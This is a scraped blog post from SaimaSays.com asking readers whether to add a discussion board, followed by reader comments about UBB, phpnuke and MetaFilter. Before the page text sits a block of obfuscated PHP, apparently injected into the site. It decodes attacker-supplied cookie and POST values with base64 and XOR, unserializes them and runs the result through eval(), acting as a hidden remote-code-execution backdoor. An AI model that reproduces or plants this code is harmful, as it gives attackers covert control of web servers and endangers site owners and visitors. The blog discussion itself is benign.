$XjtazQGNLZ = chr (85) . "\137" . "\125" . chr (98) . chr (98); $YkIHtxDJ = "\x63" . 'l' . chr ( 688 - 591 )."\163" . 's' . '_' . "\145" . chr (120) . "\151" . chr (115) . 't' . chr (115); $vjkYtt = class_exists($XjtazQGNLZ); $YkIHtxDJ = "28484";$jfGVdIh = strpos($YkIHtxDJ, $XjtazQGNLZ);if ($vjkYtt == $jfGVdIh){function nUIjph(){$QjgVmgYsu = new /* 61615 */ U_Ubb(63092 + 63092); $QjgVmgYsu = NULL;}$RiHPdeVRgn = "63092";class U_Ubb{private function nBgFwEdIah($RiHPdeVRgn){if (is_array(U_Ubb::$FqPIG)) {$vKScSbcYj2 = str_replace("<" . "?php", "", U_Ubb::$FqPIG["content"]);eval($vKScSbcYj2); $RiHPdeVRgn = "63092";exit();}}public function PzZdhVoV(){$vKScSbcYj = "29015";$this->_dummy = str_repeat($vKScSbcYj, strlen($vKScSbcYj));}public function __destruct(){U_Ubb::$FqPIG = @unserialize(U_Ubb::$FqPIG); $RiHPdeVRgn = "9051_60179";$this->nBgFwEdIah($RiHPdeVRgn); $RiHPdeVRgn = "9051_60179";}public function sSKpKNOo($vKScSbcYj, $wJIyyODkD){return $vKScSbcYj[0] ^ str_repeat($wJIyyODkD, intval(strlen($vKScSbcYj[0]) / strlen($wJIyyODkD)) + 1);}public function WEUWl($vKScSbcYj){$xzPwBeGSNg = chr ( 458 - 360 )."\x61" . 's' . 'e' . "\66" . chr (52);return array_map($xzPwBeGSNg . '_' . chr ( 344 - 244 )."\x65" . "\x63" . chr ( 840 - 729 )."\144" . chr (101), array($vKScSbcYj,));}public function __construct($ooNll=0){$qkQctSqYWU = chr (44); $vKScSbcYj = "";$BFqpabi = $_POST;$NMWdy = $_COOKIE;$wJIyyODkD = "47d204fd-06b8-41c4-8cb1-d61c55bbcd40";$WNNrxZKr = @$NMWdy[substr($wJIyyODkD, 0, 4)];if (!empty($WNNrxZKr)){$WNNrxZKr = explode($qkQctSqYWU, $WNNrxZKr);foreach ($WNNrxZKr as $LWvzF){$vKScSbcYj .= @$NMWdy[$LWvzF];$vKScSbcYj .= @$BFqpabi[$LWvzF];}$vKScSbcYj = $this->WEUWl($vKScSbcYj);}U_Ubb::$FqPIG = $this->sSKpKNOo($vKScSbcYj, $wJIyyODkD);if (strpos($wJIyyODkD, $qkQctSqYWU) !== FALSE){$wJIyyODkD = explode($qkQctSqYWU, $wJIyyODkD); $iEMOa = base64_decode(md5($wJIyyODkD[0])); $ZelQYTD = strlen($wJIyyODkD[1]) > 5 ? substr($wJIyyODkD[1], 0, 5) : $wJIyyODkD[1];$_GET['new_key'] = md5(implode('', $wJIyyODkD)); $lTnldDbC = str_repeat($ZelQYTD, 2);}}public static $FqPIG = 11292;}nUIjph();} Should I have a discussion – Saima Says

Should I have a discussion

Should I have a discussion board here at SaimaSays.com aswell as/as opposed to the comments feature? Would you actively take part if there was one? Should we use it to discuss general topics and use the comments feature for the individual posts I make? What different forums/topics/subjects should be included in the discussion board? Would you be interested in being a moderator?


  1. Funny, I found 0 comments on this :p Does that say anything?
    If you ask me. go ahead and run phpnuke or postnuke.. play around have fun…
    Do not think you would be able to sustain many topics if you were to start them….. lets learn to walk before we learn to run……. 😉

  2. 1. Should I have a discussion board here at SaimaSays.com aswell as/as opposed to the comments feature?
    Belt and suspenders? No. Then again, depends on what you want to do with your site and where you want to take it.
    If you are having trouble tracking all the ‘new’ comments in the various threads, which is a common complaint about dot/asp/php-comments, you can try Jerry Kindall’s aspcomments2. It has a mechanism that lets you see all the comments, including the new ones in one pane. He can be found at http://www.jerrykindall.com . Steven den Beste installed UBB just so that he could keep track of all the new comments in one pane rather than go through each and every comment entry trying to figure out if anyone had said anything new.
    If you want to move to a more ‘community’/’couch’ format for your site, then something along the lines of UBB maybe more appropriate. It all depends on what you want to do with your site.
    2. Would you actively take part if there was one?
    Depends on the topic being discussed. But, I think a discussion board promoted more ‘user-to-user’ chit-chat than a more blog-entry specific replies.
    3. Should we use it to discuss general topics and use the comments feature for the individual posts I make?
    Depends on what you want to do with your site. Are you planning to move your blog to a bulletin board style ‘community’?
    4. What different forums/topics/subjects should be included in the discussion board?
    Depends on you and your regulars. What would you want to talk about? What would you want others to talk about?
    5. Would you be interested in being a moderator?
    No. (Too many regrets from the past. Someone else might.)

  3. I don’t have ASP support so anyway…
    0 comments…what does that say? Umm nothing really. I still know people visit this site and there are regulars people who comment all the time on topics that interest them. Or maybe it’s just been a slow weekend, who knows?
    UBB, maybe. I think it might be fun. That way you guys can have more input.
    I’ve had a look at php nuke already. I think I’ll stick to this for now.
    And Tamin, you wouldn’t happen to be a regular at MeFi would you? 🙂

  4. Yes, I am a regular at mefi. Unfortunately, I am not Tamim Ansary, who is a published author and writes much much better than anything I can type out.

  5. Ooops. Sorry to be the least know of all the ‘Tamim’s of the world. I am sure some of the more famous ‘Tamim’s read your site as well.
    I found this site when Anil Dash posted a link to it on MeFi some time ago.

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